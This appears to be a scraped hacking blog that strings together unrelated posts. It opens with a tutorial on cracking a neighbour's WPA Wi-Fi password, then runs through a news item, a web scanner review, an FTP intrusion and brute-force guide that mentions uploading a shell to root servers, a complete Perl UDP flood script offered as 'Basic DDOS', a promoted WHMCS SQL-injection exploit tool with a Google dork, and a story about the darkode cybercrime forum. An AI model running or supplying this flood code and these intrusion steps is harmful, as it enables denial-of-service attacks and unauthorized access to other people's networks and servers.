Easy Way to Hack WEP/WPA/WPA2 Wi-Fi Password

 

Easy Way to Hack WiFi Password

If you are living nearby someones WiFi hotspot and every time your laptop search for connection its showing up but you don't have passwords. Or you just want to steal someones WPA/WPA2 Wi-Fi hotspot key or passwords. Don't worry...

In this tutorial I’ll show How to hack a WPA/WPA2 Wi-Ficonnection through a bootable USB.

Things you should need:

1. A USB pen drive.

2. beini.iso file. [Download it from HERE].

3. UNetbootin software to make your USB drive bootable. [Download for Windows, Linux or Mac]

Some few steps you should to do ( WEP):

1. Write beini.iso on your USB by UNetbootin. Set everything according to this image bellow.

2. After finishing restart your PC and boot it from your USB.
3. If you were successful to boot up then you should see something like this. Click Minidwep-gtk.

4. Click OK.

5. Now Minipwep-gtk  program will open. Click Scan.

6. Select a wireless network(should have Clint) from the list. And click Lunch to start creaking process.

7. Sometimes its take a while according to your victim connections IVS value and password strength. So keep passions.

8. If it found a password, it should appear like this.

To creak WPA/WPA2 follow this image instruction.

Let me know if you have done it successfully or you have any complicity.

Download here

National Day of Mourning: PHL pays tribute to 44 fallen PNP-SAF men

From Anonymous:

It has come to our attention that 44 elite cops died in a "misencounter" with the Moro Islamic Liberation Front (MILF) and the Bangsamoro Islamic Freedom Fighters (BIFF) in Mamasapano, Maguindanao on Sunday.

Sa pamilya ng mga nasawi, ang aming pakikiramay.

To President Benigno "Noynoy" Aquino:

Brave men have died fighting for your reign and now that they need "just recognition for their deeds" you were not there to honor them.

Hindi pa sapat na pambabastos ninyo by not attending the rites at Villamor Air Base;late ka pa ngayon sa necrological service!

RESPETO AT HUSTISYA ang isinisigaw ng taong-bayan sa mga binitiwan mong pananalita bilang Pangulo ng Pilipinas!

We are watching you Mr. President.

~3xploiter

#Repost #From #Respected #Anonymous

(Updated 11:56 a.m.) The Philippines is in mourning on Friday as the nation remembers the sacrifice of 44 elite Philippine National Police-Special Action Force personnel killed in a clash in Mamasapano in Maguindanao on Sunday.

Fellow PNP-SAF personnel shared memories of their fallen comrades at a necrological service Friday morning at Camp Bagong Diwa in Taguig.

"We know your names, we know your faces, we will never forget how we fought together," Col. Danilo Pamonag of the Armed Forces of the Philippines' Special Operations Command said.

Pamonag explained that his unit has worked with some of the slain PNP-SAF men in some missions, including the Zamboanga siege.

"Dalawang miyembro ng SAF ang nasawi, pero ang pagkamatay nila ay nagresulta sa pagkaligtas ng mga tao," he said.

Ending his speech, Pamonag said, "Sa ating mga kasamahang ngayon ay nakalimbay, isang payapang paglalakbay."

24 Oras: Brutal na pagpatay ng BIFF at MILF sa mga pulis, ikinuwento ng isang survivor na pulis

Vulnerability Scanners

Security of a website is very crucial thing for any organization or for personal websites. It’s always advised to check the security of the website because it’s better and safer to know the loopholes of our website before any attackers finds and exploits it. The commonly seen web application vulnerabilities are

• SQL Injection
• Cross Site Scripting (XSS)
• Cross Site Request Forgery (CSRF)
• Insecure Session Handling
• Session Fixation
• Information Disclosure
• Header Injection
• Insecure Configuration
• Weak randomness

Over the times, there are many tools which are being developed for providing better security and for uncovering various vulnerabilities. A vulnerability scanner is developed in order to detect the loopholes and some of these tools also suggest the prevention methods which can be implemented. The main reason why we prefer automated tools is because the process of manual exploitation could produce improper results or can crash the applications. A large number of web application scanning tools are available, both commercial and open source. We will see about few top web–application scanners and some of them are as follows

• Websecurify
• Net Sparker Community Edition.
• WSSA
• NStalker
• W3af
• Acunetix

1. Websecurify:
   URL: http://www.websecurify.com/
   

Websecurify is a tool that can be run on Windows, Linux and MAC. It is the best tool to find the common web vulnerabilities.

Once the target has been scanned, the tool starts fuzzing and gives the results once it is done. The scan results will contains the description about the vulnerability, solution and the URL which is vulnerable which helps us to understand and fix the vulnerability as soon as possible. A sample scan results are shown below

It can detect the vulnerabilities like sqli, LFI/RFI, XSS, CSRF and other categories which come under the OWASP top 10. This tool also has an online version of scanner. The url is http://scanner.websecurify.com and the user has to sign up for further scanning. For further reading, go to http://scanner.websecurify.com/tutorial

Note: The online scanner is beta version.

Features of this tool:

• Easy to use
• Simultaneous testing
• Advanced Reporting

NetSparker:

URL:
http://www.mavitunasecurity.com/netsparker/

NetSparker is again an effective website vulnerability scanner and also very simple to use. It comes in both community edition and paid version.

To perform the scan, press the “Start New Scan” option and enter the target URL and press start scan to scan the website. You can find three tabs namely vulnerability, browser view and Http request/response.

In the vulnerability tab, you can get the information about the vulnerable URL, description, impact and how it can be fixed.

You can view the vulnerability chart also to understand the various loopholes along with the seriousness level.

Features:

Some of the features are

1. Post Exploitation feature takes automated exploitation to the next level.

Want to learn more?? The InfoSec Institute CISSP Training course trains and prepares you to pass the premier security certification, the CISSP. Professionals that hold the CISSP have demonstrated that they have deep knowledge of all 10 Common Body of Knowledge Domains, and have the necessary skills to provide leadership in the creation and operational duties of enterprise wide information security programs.

InfoSec Institute's proprietary CISSP certification courseware materials are always up to date and synchronized with the latest ISC2 exam objectives. Our industry leading course curriculum combined with our award-winning CISSP training provided by expert instructors delivers the platform you need in order to pass the CISSP exam with flying colors. You will leave the InfoSec Institute CISSP Boot Camp with the knowledge and domain expertise to successfully pass the CISSP exam the first time you take it. Some benefits of the CISSP Boot Camp are:

• Dual Certification - CISSP and ISSEP/ISSMP/ISSAP
• We have cultivated a strong reputation for getting at the secrets of the CISSP certification exam
• Our materials are always updated with the latest information on the exam objectives: This is NOT a Common Body of Knowledge review-it is intense, successful preparation for CISSP certification.
• We focus on preparing you for the CISSP certification exam through drill sessions, review of the entire Common Body of Knowledge, and practical question and answer scenarios, all following a high-energy seminar approach.

VIEW CISSP TRAINING

2. We have in built encoder in this scanner.

3. We have an option for controlled scan.

Web Site Security Audit – WSSA

URL:
http://www.beyondsecurity.com/vulnerability-scanner.html

Beyond Security have a very good web application vulnerability scanner and also integrates with network scanning. The WSSA also comes with Automated Vulnerability Detection System (AVDS) focus is accuracy. A problem in web application scanning is the ‘false positive. There are many scanners that give a long list of possible vulnerabilities but on further investigation it can be found that some of these are not actually present. The technology used does the testing based on the behavior instead of version checking. Testing behavior of a host is like penetration testing. Checking the version number and using that to assume vulnerability is present is inaccurate. For more information on these two testing methods

At the same time, some scanners have a false positive rate of 10%. Most of them have 3%. AVDS is at .1%. This low rate means reduced time spent looking for problems that are reported but do not actually exist. It also increases confidence that the vulnerability report is accurate and that repair and remediation action is truly required.

This scanner is a paid version but comes with a 15 days trial.

Beyond Security also provide an online website scanner which provides the vulnerability report in a very detailed and can be understood easily even by a normal person. The scan reports are pretty fast and accurate and all this service comes free and if interested, you can also upgrade your account by paying some. The first step would be, entering your website

Step 2: Enter the email id which is related to the domain name.

Once done, you will be getting the detailed report about the domain to the email address which you have specified. This online service can detect almost all the vulnerabilities like poorly coded web pages, database connections that have issues, Examples are: SQL injection, XSS (cross site scripting), Remote File Inclusion, PHP/ASP Code Injection, Directory Traversal and File Disclosure.

With this service, we can also identify the results of an attack by a virus, trojan or worm. Example: malicious code may open a TCP port for unauthorized access from the internet.

System mis-configuration. Example: a service using a known default user name or password; or omitted security updates/patches.

URL:
https://scanmyserver.com

N-Stalker

URL:
http://www.nstalker.com/products/editions/free/

N-Stalker Web Application Security Scanner is a Web security assessment tool. It incorporates with a well-known N-Stealth HTTP Security Scanner and 35,000 Web attack signature database. This tool also comes in both free and paid version.

Before scanning the target, go to “License Manager” tab, perform the update. Once update, you will note the status as up to date.

Now goto “Scan Session”, enter the target URL.

In scan policy, you can select from the four options,

• Manual test which will crawl the website and will be waiting for manual attacks.
• full xss assessment
• owasp policy
• Web server infrastructure analysis.

Once, the option has been selected, next step is “Optimize settings” which will crawl the whole website for further analysis. In review option, you can get all the information like host information, technologies used, policy name, etc.

Once done, start the session and start the scan. The scanner will crawl the whole website and will show the scripts, broken pages, hidden fields, information leakage, web forms related information which helps to analyze further.

Once the scan is completed, the NStalker scanner will show details like severity level, vulnerability class, why is it an issue, the fix for the issue and the URL which is vulnerable to the particular vulnerability?

W3af:

W3af is another famous open source web application auditing and attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle which can be used accordingly. These modules in w3af comes with various sub modules like for example, we can select sqli option in Audit module if we need to perform a particular type of auditing.

The below diagram shows a brief flowchart of the target website and makes it’s more easy to understand.

Once the scan is completed, the W3af framework shows a details information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation.

Once the vulnerability is found, we can configure the plugins in the “Exploit” tab and perform further attack which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level.

Acunetix:

URL: http://www.acunetix.com

Acunetix is another famous website vulnerability scanner. It comes in both free and commercial version. To download the scanner, signup in their website and you will be getting the download link. The drawback in the free edition, we cannot perform a full web vulnerability scan.

To perform the scan, click the “New Scan” option and enter the target website.

Once the target site is selected, the next step is where you can select the scan profile. This option really saves the time while performing a vulnerability scan. If you want to perform a specific scan like for example Blind sql injection, the scanner would test only for Bsqli rather than performing other scan tests.

Once the profile is selected, next option is where are you will get options like the details of the website and the technologies used by the target website.

Once the details are done, click the next button and perform the scan. The scan time will depend on the size of the website. For example, if the website is small, then the scan would  complete in less time period.

.

Conclusion:

There are many other scanners too in the market which is good and open source and the only thing which makes them stand out is the efficiency and changes of less false positives. Also the difference between the free edition and commercial version of scanners have many limitations and commercial version of scanners have a better sensors, exploit package but all these come in a high price which is one of the negative point.

While getting a scanner, always do some research on the market in order to understand which is better, efficient, less damage causing to the website as well as network, etc. My all time favorite is scanmyserver.com which gives a simple and easy to understand as well the recommendations for the vulnerabilities are easy to follow.

HACK A SITE THROUGH FTP [CRYPTING]

HELLO THERE , TODAY I AM  POSTING A TUTORIAL ON WEB-PENETRATION. I WILL BE EXPLAINING HOW TO CRACK AND HACK AN FTP SERVER.

WHAT IS “FTP” ?

FTP STANDS FOR FILE TRANSFER PROTOCOL. AS YOU CAN SEE BY THE NAME, YOU CAN MANAGE FILES THROUGH THE FTP. THE FTP PORT, IS VERY-WELL KNOWN, BUT IS RARELY OPEN ON BIG WEBSITES. THE FTP PORT IS PORT 21. THERE ARE MULTIPLE WAYS TO CONNECT TO AN FTP SERVER/PORT, ESPECIALLY THANKS TO TECHNOLOGY, SUCH AS FILEZILLA.

THERE ARE OF COURSE OTHER WAYS, WHICH ARE THE MANUAL WAYS. WHICH IS CONNECTING TO THE FTP THROUGH A DOS COMMAND LINE. YOU CAN DO THIS FROM UBUNTU, BACKTRACK, (ALL LINUX), AND ALSO WINDOWS. I’VE NEVER TRIED IT ON MAC, BUT I’M SURE IT’S POSSIBLE.

WHEN YOU HAVE ACCESS TO THE FTP, YOU’RE THE KING OF THE WEBSITE. MOSTLY BECAUSE YOU CAN MANAGE ALL OF THE FILES AND DIRECTORIES ON THE SITE. SO YOU CAN UPLOAD AND DELETE. IF YOU UPLOAD YOUR PHP OR ASP SHELL, YOU COULD ROOT THE SERVER, AND POSSIBLY HACK OTHER SITES.
HOW DO I KNOW IF THE FTP PORT IS OPEN?

WELL, YOU DON’T KNOW UNTIL YOU SCAN. THE MOST POPULAR PORT SCANNER WOULD BE NMAP. YOU CAN DOWNLOAD NMAP AT  WWW.NMAP.ORG

HOW DO I CONNECT TO FTP ?

LIKE I SAID, THERE ARE A COUPLE OPTIONS. PERSONALLY, I WOULD CHOOSE THE COMMAND LINE FIRST, BECAUSE YOU LEARN FROM IT. IN A PROGRAM LIKE FILEZILLA, WITH ALL THE FANCY SHIT, IT’S GOT IT ALL. EASY TO WORK WITH, ETC. BUT THE METHOD WE WILL BE USING TO CONNECT, IS WITH “TELNET”.

TELNET IS A NETWORK PROTOCOL THAT YOU CAN USE TO CONNECT TO CERTAIN PORTS ON HOSTS. YOU WOULD EITHER NEED THE WEBSITE NAME, OR IP TO CONNECT. YOU WOULD ALSO HAVE TO MAKE SURE THE PORT THAT YOU WANT TO CONNECT TO, IS OPEN. TO DO THAT, WE NEED A PROGRAM CALLED “NMAP”. NMAP IS A FREE PORT-SCANNER TOOL, IT IS VERY USEFUL TO MANY HACKERS FOR MULTIPLE REASONS.
TO CONNECT TO FTP ON A SITE, AN IP, OR A COMPUTER, YOU NEED TO HAVE TELNET INSTALLED. TELNET IS ALREADY INSTALLED ON ALL WINDOWS AND LINUX OPERATING SYSTEMS. BUT IN WINDOWS 7 & VISTA, YOU HAVE TO CHANGE SOME SETTINGS.

THIS CAN BE DONE VERY EASILY, SIMPLY GO TO CONTROL PANEL ==> PROGRAMS AND FEATURES ==> TURN WINDOWS FEATURES ON OR OFF ==> CHECK OFF THE TELNET CLIENT.

NOW WE CAN SUCCESSFULLY CONNECT TO A PORT THROUGH TELNET.

SO OPEN CMD (COMMAND PROMPT(START => RUN => CMD)). NOW IN THE COMMAND PROMPT, TYPE:
  

CODE:

TELNET

AND HIT ENTER. NOW WE’RE ON TELNET, SO WE CAN CONNECT TO A PORT. IF YOU WOULD LIKE TO GET FAMILIAR WITH THE COMMANDS, SIMPLY TYPE IN “HELP” IN THE COMMAND PROMPT.

NOW, LET’S CONNECT TO OUR SITE (FIRST MAKE SURE THE FTP PORT IS OPEN (PORT 21). NOW, LET’S TYPE IN:

CODE:

o http://www.sitename.com 21

NOW IT SHOULD DISPLAY SOME INFORMATION ON THE FTP, WE CAN USE THAT INFORMATION AGAINST THE SITE, BY SIMPLY GOOGLING SOME EXPLOITS FOR IT.
EXAMPLE: “PROFTPD 1.3.3C EXPLOIT”.

HOW DO I HACK A SITE THROUGH FTP ?

THERE ARE A COUPLE WAYS TO DO THIS, MY FAVORITES ARE LOOKING FOR EXPLOITS IN THE FTP CLIENT AND VERSION, AND BRUTEFORCING/DICTIONARY ATTACK. THE FIRST METHOD IS VERY SIMPLE, JUST READ THE ABOVE SECTION TO FIGURE OUT HOW TO DO IT.

BRUTEFORCING IS WHEN YOU ATTACK A TARGET BY USING SOMTIMES MILLIONS OF PASSWORDS. BRUTEFORCE USES RANDOM COMBINATIONS, WHEREAS A DICTIONARY ATTACK USES WORDS. THE DICTIONARY ATTACK GOES MUCH FASTER, BUT WILL NOT ALWAYS WORK. I ONLY BRUTEFORCE WHEN I HAVE NO OTHER CHOICE.

THE SECOND WAY, IS STILL PRETTY EASY, BUT REQUIRES A LITTLE BIT MORE BRAIN  . IF YOU WANT TO DO IT MORE “ADVANCED-LY” THEN DOWNLOAD “HYDRA”. HYDRA IS A PROGRAM THAT WILL PERFORM A DICTIONARY ATTACK ON ANY OPEN PORT ON YOUR TARGET SITE, OR IP.

THE EASY WAY TO DO IT, IS BY DOWNLOADING “BRUTUS”. IT DOES THE SAME THING, BUT IT’S EASIER TO NAVIGATE AND USE. YOU CAN GET BOTH PROGRAMS BY GOOGLING THEM. IF YOU CAN’T FIND ANY, PM ME AND I’LL SEND YOU A GOOD LINK.

IF YOU ALREADY HAVE THE CREDNTIALS, YOU CAN LOGIN TO THE FTP OVER TELNET, BY DOING THE FOLLOWING:

CODE:

o http://www.site.com 21
-
PASV
-
USER -USERNAMEHERE-
PASS -PASSWORDHERE-

EPILOGUE

THIS IS A TUTORIAL FOR BEGINNERS, BUT IF I MISSED SOMETHING PLEASE NOTIFY ME BY PM OR BY REPLYING IN THE COMMENT SECTION. THIS TUTORIAL DOES SEEM VERY BRIEF TO ME, BUT I CAN’T EXPLAIN EVERY EXPLOIT THERE IS FOR FTP, OTHERWISE THE TUTORIAL WOULD BE TOO LONG AND BORING.

IF YOU REQUIRE ANY ASSISTANCE, BE SURE TO CONTACT ME BY PM. I ALWAYS READ MY PMS, AND I 90% OF THE TIME REPLY TO ALL OF THEM.

I REALLY HOPE THIS TUTORIAL HELPED, BUT IF IT DIDN’T, PLEASE TELL ME WHAT I DID WRONG ON THIS TUTORIAL, SO THAT I CAN FIX IT FOR YOU. 

Basic DDOS

Title: Basic DDOS by: Ghost King
Usage: perl /path/path/path/path/flood.pl <ip> <port> <size> <time>
Example: perl /path/path/path/path/flood.pl 178.21.18.143 80 1020 100
Install: Make sure you have perl installed on your computer.
Download: Make a file called: "flood.pl" and put the following script in it:

Yamagata Gennosuke

Code: [Select]

#!/usr/bin/perl START SCRIPT

use Socket;
use strict;

if ($#ARGV != 3) {
  print "#################################################\n";
  print "# flood.pl <ip> <port> <size> <time>            #\n";
  print "#                                               #\n";
  print "# ip=www.example.com or 93.184.216.119          #\n";
  print "# port=0: use random ports (default: 80)        #\n"; 
  print "# size=0: use random size between 64 and 1024   #\n";
  print "# time=0: continuous flood (time: seconds)      #\n"; 
  print "#################################################\n";
  exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);


print "#################################################\n";
print "#Basic DDOS by Ghost King                        \n";
print "#Flooding: $ip                                   \n";
print "#Port: $port                                     \n";
print "#Size: $size                                     \n";
print "#Time: $time                                     \n";
print "#################################################\n";
print "Stop flooding with Ctrl-C\n";

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94wRAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumuswaraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwXfjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73uGIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHYZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));}

#!/usr/bin/perl END SCRIPT

Realtime Proxy Check - Use your bandwidth and check proxies

Realtime Proxy Check is to be used in computers, smartphones and tablets. Basically what it does is check a few servers and report back to the user. The user then has a notification of what proxies can be use in the network.



Download:
http://uploaded.net/file/8pcqseyg

Yamagata Gennosuke

Tool for Exploiter WHMCS 5.2.8 - SQL Injection Vulnerability by GOTHIE

# Support PROXY (To Google does not block your IP) 
# Do not duplicate Adds Domains List to test the exploit 
# MultThreads sending and Exploit test, speeding up the process! 
# Check if the Security Level allows the user to read files load_file (0x2f6574632f706173737764)

Watch The Video


# Exploit Title: WHMCS 5.2.8 SQL Injection
# Google Dork: "powered by WHMCS"
# Date: 10/18/2013
# Exploit Author: g00n ( Xploiter.net )
# Vendor Homepage: http://www.whmcs.com/
# Software Link: http://www.whmcs.com/
# Version: 5.2.8

More details http://www.exploit-db.com/exploits/29065/

Download XPL https://drive.google.com/file/d/0B3z...it?usp=sharing

Program compiled in Delphi 2010
https://www.virustotal.com/pt/file/28517.../analysis/
SHA256: 2851742556aa874d32b52bb24859a7117a427b540d25f8456f 7420cc5ad5fdc5
Nome do arquivo: WHMCS-SQLI-5.2.8-xpl.exe
Taxa de detecção: 1 / 51
Data da análise: 2014-04-21 19:20:44 UTC ( 2 horas, 43 minutos atrás )
false positive : AntiVir TR/Fraud.Gen7


http://gothie27.blogspot.com.br/

by TGA/Gothie & 

Yamagata Gennosuke

( Private ) News Exposed ~YamaGata Darkode - Ode to Lizard Squad (The Rise and Fall of a Private Community)

For the 10 of you who don't know, darkode was on of the most active English-speaking "underground" cybercrime boards. The forum was started around 2009 by a coder named "Iserdo" and gained popularity off the back of Iserdo's bot, "Buterfly bot" (AKA Mariposa), which was sold there.

In The Beginning

With Iserdo as admin, the main focus of darkode was selling and supporting his products; however, the success of butterfly bot lead to a rapid growth in user-base and quickly darkode became a popular malware marketplace, much sought after by English-speaking cybercriminals. As a result of growing popularity, the forum was turned invite-only and existing members were given a number of invites, which they could give out to whomever they chose. Of course the invite-only model just made membership more sought after and gained darkode a reputation as an elite underground forum. At some point around 2010, Iserdo left and the forum was handed over to Crim (the coder of CrimePack which was one of the early exploit kits), who also gave admin to fubar (the seller of the infamous NgrBot).

Access Refines

In march 2012 a new access model was announced, the community became layered with "fresh fish" (level 0) as the basic membership, and "Level 1" (Trusted) as the upgraded membership. For fresh fish access, an applicant would need to be invited by another member, followed by completing an interview with an admin, In order to get level 1 access, existing members would need to prove themselves to the community and if given access, would be able to view/use the level 1 marketplace, which featured more exclusive products. There was also a special "Buyer" level created, which would only allow the user access to the marketplace and not the discussion or coding sections. 

...................
...................

Lizard Squad

Even I can't explain how darkode got form where it was to here, but we can assume it was for publicity. Around the time LizardSquad became well known by DDoSing just about anything and everything, they decided to follow the same route as lulzsec(setting up a public IRC channel on freenode), unfortunately freenode was having none of this and and banned them, along with everyone in their channel, a few days later. The same week, LizardSquad had relocated to the darkode IRC, which the darkode admin appears to be fine with, he even allowed LizardSquad to spam the darkode url all-over the internet, something that was previously forbidden.


Of course, sharing an IRC only implies the darkode admin tolerated LizardSquad but may not have worked with them. I had noticed that lizardpatrol.com (the official LizardSquad website) was hidden behind cloudflare, so on a hunch I send a HTTP request to the darkode server, with the hostname set to "lizardpatrol.com", and what would you know!

Yamagata Gennosuke

Norse - IPViking Live